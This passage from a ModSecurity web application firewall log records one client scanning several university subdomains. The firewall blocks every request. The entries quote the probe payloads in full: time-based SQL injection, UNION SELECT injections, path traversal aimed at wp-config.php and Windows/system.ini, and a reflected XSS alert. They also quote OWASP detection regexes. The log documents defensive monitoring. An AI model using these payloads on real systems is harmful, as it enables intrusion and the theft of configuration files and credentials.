[severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAlV8BkAAAA1"]
[Tue Aug 29 11:48:37.370771 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAlQ3qgAAAAw"]
[Tue Aug 29 11:48:37.385492 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAlL7BQAAAAq"]
[Tue Aug 29 11:48:37.389226 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAklezgAAAAD"]
[Tue Aug 29 11:48:37.393896 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAkAMJMAAAAU"]
[Tue Aug 29 11:48:37.409795 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAk1w68AAAAY"]
[Tue Aug 29 11:48:37.413252 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAlQ3qoAAAAw"]
[Tue Aug 29 11:48:37.413364 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAjdQSMAAAAZ"]
[Tue Aug 29 11:48:37.427828 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAkwQSEAAAAS"]
[Tue Aug 29 11:48:38.361644 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14psCo-f0AAAk7QJwAAAAi"]
[Tue Aug 29 11:48:38.382009 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14psCo-f0AAAk5CfEAAAAg"]
[Tue Aug 29 11:48:38.383212 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAlFH6EAAAAk"]
[Tue Aug 29 11:48:38.403789 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAklezsAAAAD"]
[Tue Aug 29 11:48:38.405664 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAlUleMAAAA0"]
[Tue Aug 29 11:48:38.405761 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAlPmtoAAAAv"]
[Tue Aug 29 11:48:38.406198 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAkqHsUAAAAM"]
[Tue Aug 29 11:48:39.355230 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14p8Co-f0AAAlL7BgAAAAq"]
[Tue Aug 29 11:48:40.368468 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAjtdAgAAAAX"]
[Tue Aug 29 11:48:40.394696 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAluT0oAAAAe"]
[Tue Aug 29 11:48:40.410944 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAkyx94AAAAW"]
[Tue Aug 29 11:48:40.443528 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAkqHsoAAAAM"]
[Tue Aug 29 11:48:40.451835 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAlOZIwAAAAu"]
[Tue Aug 29 11:48:41.435732 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qcCo-f0AAAj12IIAAAAa"]
[Tue Aug 29 11:48:43.363085 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlUlfEAAAA0"]
[Tue Aug 29 11:48:43.367645 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAlJmbwAAAAo"]
[Tue Aug 29 11:48:43.393541 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlyrAsAAAAI"]
[Tue Aug 29 11:48:43.400730 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlJmb0AAAAo"]
[Tue Aug 29 11:48:43.405279 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag 